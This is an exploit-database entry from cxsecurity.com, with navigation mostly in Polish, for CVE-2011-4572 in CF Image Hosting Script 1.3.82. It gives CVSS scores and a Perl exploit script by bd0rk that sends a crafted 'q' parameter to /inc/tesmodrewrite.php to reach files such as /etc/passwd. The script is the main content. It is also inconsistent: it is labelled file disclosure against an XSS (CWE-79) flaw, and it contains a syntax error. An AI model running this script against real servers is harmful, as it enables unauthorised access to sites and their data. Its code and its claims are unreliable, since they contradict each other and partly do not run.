Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
CF Image Hosting Script 1.3.82 File Disclosure
2011-10-05 / 2012-08-07
Credit:
bd0rk
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2011-4572
CWE:
CWE-79
Ogólna skala CVSS:
4.3/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Brak
#!/usr/bin/perl #CF Image Hosting Script 1.3.82 File Disclosure Exploit #Bugfounder and Exploitcoder: bd0rk #Contact: www.sohcrew.school-of-hack.net #eMail: bd0rk[at]hackermail.com #Affected-Software: CF Image Hosting Script 1.3.82 #Vendor: http://www.phpkode.com #Download: http://phpkode.com/download/p/CF_Image_Hosting_v1.3.zip #Vulnerable Code in /inc/tesmodrewrite.php line 28 #echo "Current URL: " . $_GET['q']; #Tested on Ubuntu-Linux use LWP::Simple; use LWP::UserAgent; sub help() { print "Sploit: perl $0 [targethost] /dir/\n"; } print "\nCF Image Hosting Script 1.3.82 File Disclosure Exploit\n"; print "\ By bd0rk bd0rk[at]hackermail.com\n"; ($inc, $targethost, $dir, $file,) = @ARGV; $inc="/inc/"; $file="tesmodrewrite.php?q=[APossibleFile]"; my $url = "http://".$targethost.$dir.$inc.$file; my $useragent = LWP::UserAgent->new(); my $req = $useragent->get($url,":content_file"=>"[APossibleFile]"); if ($req->is_success) { print "$url <= H3h3!\n\n"; print "etc/passwd\n"; exit(); } else { print "Sploit $url Mhhh!\n[!]".$req->status_line.\n"; exit(); }
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
Show all comments
Copyright
2025
, cxsecurity.com
Back to Top